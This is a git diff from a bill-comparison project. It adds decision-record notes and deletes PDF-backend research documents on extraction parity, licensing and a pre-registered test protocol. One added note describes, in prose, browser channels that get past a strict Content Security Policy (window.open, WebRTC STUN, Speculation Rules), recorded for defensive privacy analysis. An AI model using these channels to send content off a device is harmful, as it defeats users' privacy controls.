diff --git a/.gitignore b/.gitignore index ce47748b..96ab473c 100644 --- a/.gitignore +++ b/.gitignore @@ -104,37 +104,6 @@ docs/research/provision-matching/probes/form_*.html docs/research/provision-matching/probes/labels/ docs/research/provision-matching/probes/merged_labels.json -# The PDF bake-off's P2 holdout corpus: 88 govinfo documents, 16.4 MB, downloaded by -# probes/fetch_holdout.py. Same reasoning as /bills and bills_corpus above — bill source -# material is fetched, not vendored. What makes this safe here specifically is that -# results/holdout_membership.json (committed, and covered by the spike's frozen -# PRESERVED-MANIFEST.txt) records the govinfo package id, sha256 and byte count of every -# one of the 88 files, and the fetcher verifies each download against it. A re-issued or -# withdrawn package therefore fails loudly instead of being scored as the historical input. -# No trailing slash, per the #319 symlink reasoning above. -docs/research/pdf-backend-bakeoff/holdout - -# External-validity probe evidence (A46). Running any xNN probe rewrites its own evidence -# file, so after the A46 cleanup these reappear as untracked artifacts and a later `git add -A` -# would silently re-commit the working material that was retired. Ignored rather than left -# loose. They are regenerated by running the probe; git history holds the removed versions. -# -# The negations are the artifacts something actually READS or that a byte-frozen document -# cites — dropping one un-tracks a live gate input, so only change this list together with -# the consumer that justifies it. A new committed artifact needs a new negation here. -docs/research/pdf-backend-bakeoff/validation/external-validity/results/x*.json -# G2 reads this one; G6 defects ORACLE_INTEGRATION_NOT_VERIFIED without the other. -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x2_contract_assertions.json -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x26_control_oracle.json -# Cited as MEASURED by PRE-REGISTRATION.md, which is byte-frozen and can never be repointed. -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x00_design_pilot.json -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x02_oracle_reference_defects.json -# Named by retained METHODOLOGY_SURFACE files (cross_engine_control, run_hybrid, run_extended, -# reconstruct_extended_corrected), which may not be edited for a cosmetic reason. -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x09_skeleton_cross_engine.json -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x11_provenance_chain.json -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x13_x_arm.json - # Build artifacts. The project became buildable in #398, so `uv build` now produces # these where it never used to. `build/` matters beyond tidiness: some backends copy # the package's own .py files into it, and a directory holding Python that is neither diff --git a/docs/decisions/0002-pdfium-single-engine.md b/docs/decisions/0002-pdfium-single-engine.md index 57174555..a6019ff6 100644 --- a/docs/decisions/0002-pdfium-single-engine.md +++ b/docs/decisions/0002-pdfium-single-engine.md @@ -44,6 +44,14 @@ shipped in PRs #38 and #40. point of extraction quality for this tool. - One engine instead of two means one set of text quirks to understand and one cleaning path to maintain, at the cost of that path being PDFium-specific. +- PDFium is the engine for the anchoring and chrome behaviour above, not for a + measured accuracy lead, and no backend has one. Six backends read through one + per-glyph contract, on published GPO bills of effectively one typesetting class, + showed no winner: pdfminer.six agreed best with the XML on text and headings, while + PDFium compiled to WebAssembly reproduced current output exactly and ran about 8× + faster in the browser. No design for plugging a second backend into the extractor + was selected; a hybrid of engines and an extended per-glyph contract were both + prototyped and neither was validated ([evidence](https://github.com/civictechdc/DeltaTrack/blob/4171e32d93e869725a86ae72eab70fa355a9919f/docs/research/pdf-backend-bakeoff/CLOSEOUT.md)). - The engine-vs-engine parity check could not survive pdfplumber's removal, so the regression guard is now a golden snapshot: five curated pages, each exercising one cleaner path (soft-hyphen reconstruction, VerDate-glue, watermark-glue, diff --git a/docs/decisions/0003-pdfjs-client-side-viability.md b/docs/decisions/0003-pdfjs-client-side-viability.md index 97a9476a..706db5b2 100644 --- a/docs/decisions/0003-pdfjs-client-side-viability.md +++ b/docs/decisions/0003-pdfjs-client-side-viability.md @@ -56,6 +56,16 @@ server-side engine choice in ADR 2. - Two engines across two channels (PDFium server-side, PDF.js client-side) means two extraction paths that must be kept in agreement; divergence on edge cases is a maintenance cost if both channels ship. +- Porting to TypeScript is not the only browser route. The Python engine itself runs + in a page under Pyodide: the XML comparison produces byte-identical canonical JSON + and HTML there, checked by `scripts/pyodide_parity.py`. Its one obstacle is the + module-scope `pypdfium2` import in `parsers/pdf_text.py`, which the XML comparison + reaches through module-level imports and which the check stubs out until + [#751](https://github.com/civictechdc/DeltaTrack/issues/751) makes it lazy. For PDFs + on that route, PDFium compiled to WebAssembly (`@embedpdf/pdfium`) exposes the + per-glyph data the extractor uses and reproduced current output on the published + bills tested, which would keep one PDF engine across channels rather than two. The + PDF path has not yet run end to end in a browser ([evidence](https://github.com/civictechdc/DeltaTrack/blob/4171e32d93e869725a86ae72eab70fa355a9919f/docs/research/pdf-backend-bakeoff/CLOSEOUT.md)). - **Open risk:** the spike covered only published GPO bills, which have clean text layers. Draft and pre-introduction PDFs (watermarked, possibly image-only) were not tested and are the documents where extraction is hardest and most diff --git a/docs/decisions/0011-local-only-processing.md b/docs/decisions/0011-local-only-processing.md index 9e74a654..8f0221de 100644 --- a/docs/decisions/0011-local-only-processing.md +++ b/docs/decisions/0011-local-only-processing.md @@ -99,3 +99,14 @@ Alternatives: - Telemetry, crash reporting, or "send us the file that failed" diagnostics that would carry bill content off-device are foreclosed by this rule. Diagnostics must be local or content-free. +- **A browser channel cannot guarantee zero egress with Content Security Policy + alone.** Tested against script deliberately trying to exfiltrate, a strict policy + (`connect-src 'none'`, and no `'unsafe-inline'` in `script-src`, which Speculation + Rules prefetching otherwise gets through) blocked every subresource mechanism tried. + Two mechanisms are outside CSP entirely: `window.open` opens a new browsing context + that can carry content in its URL and leaves the page in place, and WebRTC reaches a + STUN server under any page-level policy, a covert signal rather than a content + channel. Closing them needs a browser- or device-level control such as enterprise + policy. A browser channel's no-egress claim must name that dependency and be + verified at the network layer against a control shown to observe egress + ([evidence](https://github.com/civictechdc/DeltaTrack/blob/4171e32d93e869725a86ae72eab70fa355a9919f/docs/research/pdf-backend-bakeoff/CLOSEOUT.md)). diff --git a/docs/research/pdf-backend-bakeoff/CLOSEOUT.md b/docs/research/pdf-backend-bakeoff/CLOSEOUT.md deleted file mode 100644 index 8962ca72..00000000 --- a/docs/research/pdf-backend-bakeoff/CLOSEOUT.md +++ /dev/null @@ -1,79 +0,0 @@ -# PDF study closeout - -- Status: **closed.** The external-validity investigation is retired as inconclusive. No - PDF extraction architecture is recommended or validated by this directory. -- Closes the PDF research that began as two product questions: is PDFium a workable - foundation for comparing legislative PDFs, and can the Python comparison code run locally - inside a webpage. -- Every result below was measured on macOS / arm64. Nothing was tested on Windows. - -## Demonstrated - -| Capability | Evidence | Reproduce | -|---|---|---| -| The XML comparison pipeline runs under Pyodide with byte-identical canonical JSON and HTML output | [`staffer-delivery/README.md`](../staffer-delivery/README.md), re-verified 2026-08-11 with a negative control | `uv run python docs/research/staffer-delivery/probes/verify_parity.py`. Then run with `--mutate`: must report `MISMATCH` and exit 0, indicating the negative control was detected. Needs Node with the `pyodide` package | -| A self-contained, double-clickable HTML file booting the real Python engine was built and measured once | same, finding 4 | [`build_single_file.py`](../staffer-delivery/probes/build_single_file.py) with the [`single-file/`](../staffer-delivery/probes/single-file/) template. The built artifact is not committed and has not been rebuilt; it relies on a loader shim Pyodide does not support | -| PDFium in WebAssembly (`@embedpdf/pdfium`) extracts text and exposes the per-glyph API the extractor needs: char boxes, origins, font size and weight, matrices, hyphen and generated-char flags | [`RESULTS.md`](RESULTS.md) audit claim 2, [`validation/phase2/`](validation/phase2/) | [`probes/js/probe_wasm_textapi.mjs`](probes/js/probe_wasm_textapi.mjs), [`dump_pdfium_wasm.mjs`](probes/js/dump_pdfium_wasm.mjs), [`validation/phase2/g02_wasm_advance.mjs`](validation/phase2/g02_wasm_advance.mjs) | - -## Limited observations - -- **Migration parity, not accuracy.** PDFium-WASM reproduced current production output on the - audited set. That bounds migration risk; it does not rank extraction quality. -- **Narrow corpus.** The accepted population was effectively one typesetting class - ([`RESULTS.md`](RESULTS.md) audit claim 12). Confirmatory, hybrid and validation results are - compatibility and parity evidence on that population. -- **Zero egress is not achieved by CSP alone.** WebRTC, Speculation Rules and `window.open` - reach the network under the tested policy (audit claims 6 to 8). This bears directly on any - local-only browser channel. - -## Not supported - -- **No universal accuracy winner.** "PDFium-WASM is the best browser backend" was withdrawn by - the audit; pdfminer.six led the independent metrics and neither backend dominates. -- **No offline PDF comparison application was delivered.** The demonstrations above are - components. The PDF path has never run end to end in a browser. -- **No seam architecture was selected.** Hybrid versus corrected extended glyph remains open; - [`validation/`](validation/README.md) records how far the argument got. - -## The external-validity investigation: retired - -It was meant to supply a heading-level oracle and a fresh holdout. It did not. - -- **Adjudication controls failed.** The pre-registered N-A and N-B controls failed, with the - failures concentrated on the human route. The run cannot support any architecture claim. -- **Unresolved rule conflict.** PRE-REGISTRATION §5.6 says an N-B failure makes the run void; - §7 Rule 3 says any control failure means the evidence is insufficient. An earlier closeout - draft reported "void". Both lead to no architecture choice. The frozen text is not amended - here and the conflict is left open. -- **The decision stage never ran on committed evidence.** See #729 (no canonical decision - operation). -- **The heading definition is underdetermined** for running page furniture such as page-foot - bill designators, and the adjudicator applied it inconsistently. -- **All 20 controls are retired.** Their expected answers have been public in - `control_fixtures.json` since the design phase, and per-control answers from both routes were - later published on the branch of #728. A successor needs new controls. This document does - not undo those earlier disclosures. -- **Private evidence is not published.** Individual judgments, the answer key and the oracle - provenance are held privately. Scored outputs derived from them are not published here, - because they cannot be verified from public material alone. - -## Reusable code - -- Pyodide parity harness: `staffer-delivery/probes/verify_parity.py`, `parity_pyodide.mjs`. -- Single-file build: `staffer-delivery/probes/build_single_file.py`, `single-file/`. -- PDFium-WASM glyph extraction: `probes/js/dump_pdfium_wasm.mjs`, `probe_wasm_textapi.mjs`. -- Neutral glyph contract and backend adapters: `probes/contract.py`, `probes/backends/`. -- Extended-glyph reconstruction: `validation/phase2/pdfium_extended.py`, - `reconstruct_extended.py`, `contract_extended.py`. -- Egress probes: `probes/vectors2.js`, `redteam_egress2.py`, `phase4_webrtc.py`. - -## Next product task - -**Make the PDF parser's PDFium import lazy, so the engine imports under Pyodide with no stub.** -`src/deltatrack/parsers/pdf_text.py` imports `pypdfium2` at module scope. The XML path never -calls PDFium, but it reaches that import through module-level imports of -`parsers/pdf_anchors.py`, which imports `pdf_text`: at least `bill_tree.py` and the canonical -JSON formatter. Because every route ends at `pdf_text.py`, making the import lazy there covers -them all, where moving individual helpers would not. This is the remaining blocker for the -browser build and the prerequisite for plugging in a WASM PDFium backend. Tracked in #751; gate -it with `verify_parity.py`. diff --git a/docs/research/pdf-backend-bakeoff/LICENSING.md b/docs/research/pdf-backend-bakeoff/LICENSING.md deleted file mode 100644 index baba32c7..00000000 --- a/docs/research/pdf-backend-bakeoff/LICENSING.md +++ /dev/null @@ -1,145 +0,0 @@ -# Phase 6: licensing and distribution memo - -Recorded **separately from the technical score**, per the spec's instruction, so a -licensing conclusion can never be mistaken for a measurement and vice versa. - -Every license below was read from the **installed artifact** (package metadata and the -bundled `LICENSE` files), not from documentation or memory. Versions are the ones the -bake-off actually ran. - -> This is a project distribution-policy analysis, not legal advice. How licenses combine -> in a given distribution is a nuanced question this memo does not attempt to resolve. -> The operative project rule is the one the spec fixed before the bake-off ran: -> **DeltaTrack will not ship dependencies requiring AGPL compliance, absent a separate -> explicit licensing decision.** - -## The artifacts as measured - -| Component | Version | License (read from artifact) | Verified at | -|---|---|---|---| -| **DeltaTrack** | this tree | Apache-2.0 | `LICENSE` | -| **PDF.js** (`pdfjs-dist`) | 6.2.108 | Apache-2.0 | `package.json`, `LICENSE` | -| **PDFium-WASM** (`@embedpdf/pdfium`) | 2.15.0 | MIT (wrapper) — **but see the discrepancy below** | `package.json`, `LICENSE` | -| ⮑ bundled PDFium engine | fork `608d50ef` | BSD-3-Clause (PDFium Authors) | `LICENSE.pdfium` | -| **pdfminer.six** | 20260107 | MIT | package metadata | -| **pypdf** | 6.14.2 | BSD-3-Clause | package metadata | -| **pypdfium2** (incumbent) | 5.12.1 | BSD-3-Clause, Apache-2.0 | package metadata | -| **PyMuPDF** | 1.28.0 | *"Dual Licensed - GNU AFFERO GPL 3.0 or Artifex Commercial License"* | package metadata | - -## What this means for distributing a WASM binary - -The question the spec asks is specifically about **distribution**, because a client-side -tool triggers distribution obligations even where it triggers no network-service ones. - -**The permissive candidates (PDF.js, PDFium-WASM, pdfminer.six, pypdf) are all -compatible with shipping inside an Apache-2.0 project**, and all four impose the same -shape of obligation: retain the copyright notice and license text in the distributed -artifact. For a single-file HTML build that means the license texts must be embedded in -the bundle (a comment block or an about panel), not merely present in the source repo. -That is a build-step requirement, and it is cheap, but it is a real one and a single-file -artifact makes it easy to forget. - -Two specifics worth naming rather than glossing: - -- **PDFium-WASM is two licenses, not one.** The `@embedpdf` wrapper is MIT; the engine - inside the `.wasm` is BSD-3-Clause from the PDFium Authors. Both notices travel with - the binary. The shipped package carries them as separate files, which is the correct - signal that both apply. -- **PDFium vendors third-party code** (font, image and compression libraries) that this - memo did not enumerate, because the bundled `LICENSE.pdfium` covers only PDFium itself. - Before shipping a PDFium-WASM build, that transitive set needs an actual audit. Flagged - as an **open item**, not cleared. The incumbent `pypdfium2` already carries the same - question and its metadata hints at it ("dependency licenses"), so this is a - pre-existing obligation being inherited rather than a new one being taken on. - (`zlib` is confirmed present in the shipped `.wasm` by string inspection.) - -### Provenance problems found by the red-team audit, and not resolved - -These emerged after this memo was first written, and they are the reason -[`RESULTS.md`](RESULTS.md) now lists resolving them as a precondition for shipping rather -than a footnote. - -- **The declared source directory does not exist.** The published package's - `repository.directory` is `packages/pdfium`, and that path is absent from the repo's - current `main` (`packages/` holds core, engine, framework, plugin, viewer). The build - source for a 4.6 MB binary destined for congressional offices is therefore not locatable - at the address the package itself gives. -- **The licence chain disagrees with itself.** npm metadata and the bundled `LICENSE` say - **MIT** (© CloudPDF, Ji Chang); the upstream repo's own `LICENSING.md` says everything - under `packages/` is **Apache-2.0**. Both are permissive and neither blocks use, so this - is a diligence defect rather than a licensing risk — but it should be resolved in - writing before distribution, not assumed away. -- **The engine is a fork, not upstream.** The pinned artifact comes from - `embedpdf/runtime` at commit `608d50ef…`, not `pdfium.googlesource.com`. The fork's - patches have not been reviewed here. -- **Single maintainer**, 16 stars on the runtime fork (4.4k on the parent viewer repo). - -**In mitigation**, the build *is* pinned and checksummed: `engine-runtime-build.json` -carries a per-target SHA-256 for every artifact including `wasm32`, so a consumer can -verify they received the intended bytes. That is better hygiene than most WASM -redistributions and materially reduces the substitution risk — it does not address the -"can we rebuild it ourselves" question. - -### If the package disappeared - -DeltaTrack **could** vendor or rebuild an equivalent: PDFium is BSD-3 and builds to WASM. -It is not a trivial undertaking — depot_tools, `gn`/`ninja`, an Emscripten toolchain, plus -auditing whatever the `embedpdf/runtime` fork changes — but it is a known, bounded -engineering task rather than a dependency that cannot be replaced. The realistic interim -mitigation is to **vendor the verified `.wasm` and its checksum into the repo** rather than -resolve it from npm at build time. - -### PyMuPDF, and why it never enters the decision tree - -PyMuPDF's own metadata states the dual license outright. Under the project rule it is a -**ceiling reference only**, and its score in the results must not be read as a -recommendation. - -On the AGPL §13 question the spec raises: a purely client-side tool that a staffer runs -locally arguably does not engage the network-interaction clause at all, since there is no -remote user interacting with it over a network. **But that argument is irrelevant to this -decision**, because §13 is not the binding constraint — **distribution** is. Shipping the -WASM binary to a congressional office is conveying the work, and the AGPL's source- -provision obligations attach to conveyance regardless of §13. Reaching for the §13 -argument would be answering a question nobody asked. - -The obligation would also **pass downstream to any tool that consumes DeltaTrack's -output** (ADR 0005), which is the more -consequential half: a licensing choice made here for DeltaTrack's convenience becomes a -constraint on a separate product's distribution. That is exactly the kind of decision -that should be made deliberately by the maintainer rather than absorbed as a side effect -of a backend choice. - -Revisiting stays possible and stays cheap to state: an explicit licensing decision, or a -commercial license from Artifex. Neither is in scope here. - -## The number that prices a PDFium-WASM effort - -The spec's main reason for running PyMuPDF at all is to price the gap between the best -achievable score and the best *shippable* one. **The measured gap is essentially zero**, -and that is the finding: see [`RESULTS.md`](RESULTS.md) for the figures. PyMuPDF does not -outperform the permissive candidates on this corpus by a margin that would justify an -AGPL-compliance obligation or a commercial-license purchase. - -That result also dissolves the question the spec expected to be hardest. It had assumed a -PDFium-WASM effort might need funding and that PyMuPDF's score would tell us what it was -worth. In fact a credible PDFium-WASM build **already exists, is MIT/BSD-3, and already -exposes the FFI the engine needs** — so there is no engineering effort to price. - -## Recommendation - -**On licensing grounds alone, all four permissive candidates are shippable**, and PyMuPDF -is excluded by project policy rather than by any measured deficiency. - -But licence text is not the whole of a distribution decision. On **supply-chain** grounds -the four are not equivalent, and the ranking is close to the inverse of the technical one: -pdfminer.six and pypdf come from long-established PyPI projects and add no binary, PDF.js -is a Mozilla project with a decade of deployment, and is a -single-maintainer redistribution of a PDFium **fork** whose declared source path is -missing. For a tool being handed to congressional offices, that difference deserves -weight alongside the accuracy numbers. - -Two build-time obligations to carry into whichever is chosen: - -1. Embed the required notices **in the distributed artifact**, not just the repo. -2. Audit PDFium's vendored third-party licenses **before** shipping a PDFium-WASM build. diff --git a/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION-CONFIRMATORY.md b/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION-CONFIRMATORY.md deleted file mode 100644 index 3806b610..00000000 --- a/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION-CONFIRMATORY.md +++ /dev/null @@ -1,795 +0,0 @@ -# Pre-registration: narrow confirmatory run - -- Status: **frozen protocol. Nothing has been run against it.** Revised 2026-08-05 after - methodological review of the first proposal, then **amended 2026-08-05 before execution** - on four points: per-metric sabotage controls (B0), an unfillable holdout stratum (P2 #8), - gold-sample blinding, and an inside-the-sandbox known-bad control. All four were amended - **with no results visible**, which is why they are amendments and not deviations — - the [DEVIATIONS](#deviations) table opens when the first score is produced. -- Supersedes the 2026-08-05 *proposal* of the same name. It supersedes nothing else. - [`PRE-REGISTRATION.md`](PRE-REGISTRATION.md) remains the record of what the exploratory - spike committed to; [`RESULTS.md`](RESULTS.md) remains the authoritative record of the - exploratory spike and its audit, and **is not to be rewritten by this run**. -- Once execution starts, every change to this document goes in - [`results/DEVIATIONS.md`](results/) — see [§ Deviations](#deviations). - -## What the exploratory record keeps saying, unchanged - -This run does not edit, delete or "correct" the exploratory findings. `RESULTS.md` keeps, -verbatim: the original findings as published; the adversarial audit; the withdrawn -"PDFium-WASM is the best backend" claim; T4 reclassified as production migration parity; -pdfminer's stronger showing on incumbent-independent metrics; the repaired-mode bias toward -PDFium; all nine post-registration methodology changes; the narrowed security claim; the -corpus-diversity limitation; and the `@embedpdf/pdfium` provenance follow-ups. - -**The exploratory spike is exploratory.** This run is a prospective replication under a -protocol frozen in advance, plus a first look at data none of these probes has ever seen. - -## The three concerns, and why they are never combined - -| Concern | Reference | Licenses the conclusion | -|---|---|---| -| **A. Production migration parity** | today's pypdfium2 output | "safe to swap without changing what staffers see" | -| **B. Independent document accuracy** | XML and adjudicated page images, never PDFium | "reads the document correctly" | -| **C. Security / egress** | network-layer observation | "cannot transmit under policy P / in environment E" | -| **D. Performance** | wall clock on an idle machine | "fast enough, and how much faster" | -| **E. Bundle / architecture** | built browser artifacts | "costs this much to deliver" | -| **F. Supply-chain release readiness** | upstream sources | "can be adopted and re-derived" | - -**No composite score. No single "best backend" table. No verdict that spans two rows.** -Substituting an A result for a B conclusion is what produced the withdrawn headline, and it -is the single failure this document exists to prevent. - -**Candidates: `pdfium-wasm` and `pdfminer.six`.** pypdf failed and PyMuPDF is -policy-excluded (AGPL); re-running them adds noise. **PDF.js is out of A and B** — its -exploratory score belongs to `getTextContent()`, not to the library, and the operator-list -adapter that would fix that is not being built (see -[§ Unresolved design choices](#unresolved-design-choices)). It stays in **E** only, where -its artifact is already installed and the measurement is nearly free. - ---- - -# Populations - -Three, kept apart in every table. - -## P1 — replication corpus (52 documents, 30 bills) - -The existing corpus, derived at runtime from `tests/corpus/*` by -`score_phase1.corpus_documents()`. **This is no longer unseen data**: it has been inspected, -methodology was tuned against problems found in it, and the backend results are known. - -**It can only answer one question: do the exploratory findings survive the frozen -protocol?** Nothing measured on P1 generalizes on its own. - -## P2 — holdout corpus (target 12 bills, never scored by any probe) - -### Frozen selection procedure - -Executed **before** either candidate runs, output committed to -`results/holdout_membership.json`, and never revised afterwards. - -1. **Frame.** govinfo BILLSTATUS for Congresses 113–119, all bill types, via - `tools/fetch_govinfo.py`. A bill is eligible if it has **≥ 2 text versions that each - carry both PDF and XML** at `content/pkg`. -2. **Exclusions**, enumerated into the membership file at selection time rather than - assumed: the 30 replication bills; every non-corpus probe fixture (`118-s-4795`, - `CRPT-118srpt198`, the nine subcommittee prints); and **every bill present in the main - checkout's `bills/` working tree**, because that material has been looked at. -3. **Strata**, filled in this fixed order, one bill per row unless stated: - - | # | Stratum | Bills | Diversity axis it buys | - |---|---|---|---| - | 1 | Non-appropriations House bill, 118th or 119th | 2 | bill type | - | 2 | Non-appropriations Senate bill | 2 | bill type + chamber | - | 3 | Joint resolution (`hjres` / `sjres`) | 1 | bill type | - | 4 | Appropriations bill from 113 / 114 / 116 / 119 | 2 | Congress (under-represented in P1) | - | 5 | Bill whose longest version is **< 20 printed pages** | 2 | document length | - | 6 | Bill whose longest version is **> 400 printed pages** | 1 | document length | - | 7 | Bill with a watermarked Senate print (`rs` / `pcs`) | 1 | watermark / layout | - | 8 | Bill with a chamber-crossing amendment print (`eah` / `eas`) | 1 | typeface class — DeVinne-Italic, only 5 documents in P1 | - - **Stratum 8 changed, because the original was unfillable by P2's own rule.** It asked for - a conference report or a committee print. Neither is a bill: they carry no bill XML and - have no adjacent-version pairs, so neither can satisfy "≥ 2 versions each with PDF and - XML", and a stratum that can never fill would have silently spent the adequacy budget. - **Conference reports and committee prints move to P3a**, where they can be tested for - robustness and safe failure without an XML reference. - - **Honest limit on the typeface axis:** the BILLS collection offers effectively three - typesetting classes — DeVinne, DeVinne-Italic and NewCenturySchlbk-Roman (enrolled) — - and **P1 already contains all three**. P2 can add new *bills* within those classes and - can thin out P1's concentration; it cannot add a fourth class. Any GPO production class - beyond those three is reachable only through P3, without XML. - -4. **Within a stratum**: candidates sorted by bill id, permuted with seed **20260805**, and - the first that satisfies the two-dual-format-versions rule is taken. Ties are broken by - the permutation, never by inspection. -5. **Recorded before scoring**: bill id, package ids, version codes, page counts, SHA-256 of - every file, and which stratum each bill filled. - -### Adequacy rule, pre-committed - -- **≥ 8 of the 8 strata filled** → holdout supports a generalization claim. -- **5–7 filled** → holdout is reported, and the claim is *"replicates, and extends to the - classes actually sampled"*, with the unfilled strata named. -- **< 5 filled, or the fetch fails** → **the holdout is declared unobtainable**, no - generalization claim is made, and the whole run is downgraded to - **locked-protocol replication**. That downgrade is written into the results headline, not - a footnote. - -### The rule that makes a holdout a holdout - -**No holdout result may change a metric, threshold, normalization, parameter, adapter, -repair rule or population.** A backend crashing on a holdout document is a *result*, not a -bug to fix mid-run. If something must change anyway, it is a deviation and every affected -score is re-labelled non-confirmatory. - -## P3 — non-corpus robustness probes (renamed) - -The exploratory "Tier B" section is renamed **non-corpus robustness probes**, because -eleven of its twelve fixtures are published GPO Tier A prints. It is not a pre-publication -test and never was. - -| Sub-population | Fixtures | What it can support | -|---|---|---| -| P3a real, non-corpus GPO | the existing 12, **plus one real conference report (`CRPT-*`) and one real committee print (`CPRT-*`)**, both required | robustness and safe failure across GPO print classes. **No accuracy metric** — these have no XML reference and are not bills | -| P3b synthetic degradations | a rasterized (image-only) corpus PDF; a non-GPO producer PDF generated locally | **safe-failure only, never accuracy** | - -**Source classes that remain unvalidated after this run**, listed in the results as a -standing section rather than a caveat: chair's marks; discussion drafts; genuinely -pre-publication committee documents; Word-generated legislative drafts; real (not -synthesized) image-only or scanned PDFs; conference-report and committee-print layouts as -*accuracy* claims, since P3a can only test robustness and safe failure on them; other -non-GPO PDFs. Obtaining real pre-publication material needs a congressional -contact and is outside what any protocol here can arrange. - -### Safe failure is a first-class gate - -For every P3 fixture, record which of three things the production entry point does: - -| Outcome | Meaning | -|---|---| -| **DECLINES** | raises `UnsupportedLayoutError` — the safe outcome | -| **ANSWERS** | returns a diff with anchors | -| **ANSWERS ANCHORLESS** | returns a diff with **zero** anchors — a confident wrong answer | - -**Gate S-1: no fixture may land in ANSWERS ANCHORLESS.** The exploratory run produced -exactly that state once (3,468 amount entries against the XML's 0, on an enrolled pair -reached by bypassing the guard), which is why this is a gate and not an observation. - ---- - -# Concern A — production migration parity - -**Question.** If we replace pypdfium2 with candidate X, does any output production currently -returns to users change? - -**Reference: today's native pypdfium2 through the identical downstream pipeline.** That is -correct *here* and nowhere else — this section is about migration compatibility, not -correctness. - -### Frozen population and strata - -**All 15 consecutive corpus pairs, always all 15 visible**, in two strata: - -| Stratum | N | Role | -|---|---|---| -| **Production-accepted** | 13 | **the migration gate** | -| **Production-declined** (`115-hr-5895/4→5`, `118-hr-4366/5→6`) | 2 | unsupported-layout **diagnostics**, scored with the guard bypassed | - -Membership is derived at runtime from `compare/pdf.py::_is_unnumbered_layout`, never -hardcoded: if production's guard changes, the strata change with it and the run says so. -Holdout pairs (P2) are scored under the same rules and reported separately. - -### Frozen metrics - -| ID | Metric | Definition | -|---|---|---| -| A1 | Amount identity | `Counter[(old, new, kind)]` over all `amount_entries` equals the incumbent's, exactly | -| A2 | Change identity | `Counter[(change_type, norm(old), norm(new))]` equals the incumbent's, exactly | -| A3 | Amount F1 | precision / recall / F1 of the A1 multiset, for when A1 fails | -| A4 | Full-text identity | SHA-256 of `pdf_full_text` output equals the incumbent's | -| A5 | Line-number identity | exact `(page, line)` set equals the incumbent's | - -`norm()` is frozen as the current `score_phase2.norm_text` (whitespace runs, -`normalize_glyphs`, soft-hyphen rejoin, margin line numbers, U+FFFD removal). -**Widening it later is a protocol violation**, because every widening inflates agreement. - -A5 moved here from the exploratory Concern-B metric set: its reference is the incumbent, so -it is a parity measurement, not an accuracy one. - -### Frozen gates - -| Gate | Threshold | Name | -|---|---|---| -| **A-1** | A1 holds on **13/13** production-accepted pairs | production migration parity | -| **A-2** | A2 holds on **13/13** production-accepted pairs | production migration parity | -| **A-3** | A4 holds on all production-accepted documents | production migration parity | -| **A-4** | A1 **and** A2 hold on **15/15** including the 2 declined | *backend equivalence beyond supported production behavior* | - -**Pass = A-1, A-2 and A-3.** A-4 is reported separately and is explicitly **not** production -migration parity — the two declined pairs are not staffer-visible output and must not decide -whether a migration is safe today. A candidate that passes A-1 but fails A-2 is reported as -*"money-safe, segmentation-divergent"*, which is a real intermediate state, not a pass. - -### Repair mode for Concern A - -**Primary: `repaired` — the mode we would actually ship.** A deterministic backend adapter -normalizing a known source-library quirk is part of the intended production implementation; -production already does the equivalent for the text API in `normalize_raw`. -**`strict` is reported as a diagnostic on every metric.** A1/A2 are mode-identical anyway, -so this costs nothing and it stops the migration gate from being graded against a mode -nobody would ship. - ---- - -# Concern B — independent document accuracy - -**Question.** Which candidate most accurately recovers the underlying legislative document, -when PDFium is not the reference? - -**No metric in this section may take a PDFium-derived value as ground truth.** Excluded by -name: incumbent breadcrumb agreement; incumbent line-number sets; T4; and any expected value -computed by running PDFium. If a metric cannot be computed without PDFium, it does not -belong here. - -**Reported separately for P1 (replication) and P2 (holdout). Never pooled.** - -### Frozen population - -- **Production-accepted documents** are the primary population. Enrolled documents are - reported separately and never merged in. -- **Stratified by body font** (`DeVinne` / `NewCenturySchlbk-Roman` / `DeVinne-Italic`), - because the audit found P1 is effectively one typesetting class and an aggregate hides it. -- **Per-bill results are mandatory.** One bill supplies 6 of 52 P1 documents. - -### Frozen metrics - -| ID | Metric | Reference | Definition | -|---|---|---|---| -| B1 | Text recovery F1 | XML body | Multiset token F1 after `align_to_body` edge-trim, both frozen as implemented today. Unaffected by DeltaTrack#11 — the reference is a raw `extract_text_content` walk that includes `` text | -| B2 | **Heading-label recovery** F1 | XML tree | **Level-agnostic**: PDF anchors of kind {account, agency, grouping} against XML labels of level {account, agency, heading}; upper-cased, commas and periods stripped | -| B3a | Line-number self-consistency | the document itself | Per page: recovered margin numbers form a gap-free run `1..n`, and `n` equals the count of numbered body lines. **No external reference** | -| B3b | Line-number exactness | adjudicated page images | Exact `(page, line)` match on gold-sample pages only | -| B5 | **Amount → heading association** | XML tree | For amounts present on **both** sides, F1 over the multiset of `(amount, nearest heading-ish ancestor label)` pairs. Restricting to shared amounts isolates *association* from *detection* | -| B6 | **Parent/child heading correctness** | XML tree | For each PDF heading whose label matches an XML heading, accuracy of its immediate heading-ish parent's label against the XML node's | -| B7 | Independent-extractor corroboration | PyMuPDF `get_text()` | Sampled amounts appear in an unrelated extractor's text on the side claimed. **Corroboration, not ground truth** | -| B8 | Gold-sample agreement | adjudicated page images | Per-item agreement on the gold set (see below) | - -**B2 measures heading-label recovery, not structural accuracy.** A backend can find every -heading and attach them all wrongly. B5 and B6 exist because that failure is the one with a -product consequence: heading attachment is what puts an amount under the right agency and -account in the financial tables. - -**B2 is level-agnostic by pre-commitment, and this is load-bearing.** A level-by-level -comparison produced a *false reversal* during the audit (PDFium appearing to over-detect -accounts 46-to-27) because the two pipelines name the same objects differently — the XML's -`agency` holds `Military construction, air force`, which the PDF calls an `account`. - -**DeltaTrack#11 scope, stated per metric rather than globally:** B2, B5 and B6 read the -parser tree, which drops ``; **25 of the 52 P1 XMLs carry one**. Those documents -are reported in their own stratum for B2/B5/B6 and are excluded from the primary figure. -B1 and B3 are unaffected. - -**B2 is new code at population scale.** The exploratory 0.5864 / 0.6253 heading figures are -means over the **six** documents in `redteam_ablation.py`, not over 52. Confirmatory B2 will -not be numerically comparable to them, and the results must say so rather than appear to -replicate a number it never measured. - -### B0 — harness sensitivity controls (a gate on the metrics, not on the backends) - -A metric that cannot distinguish good 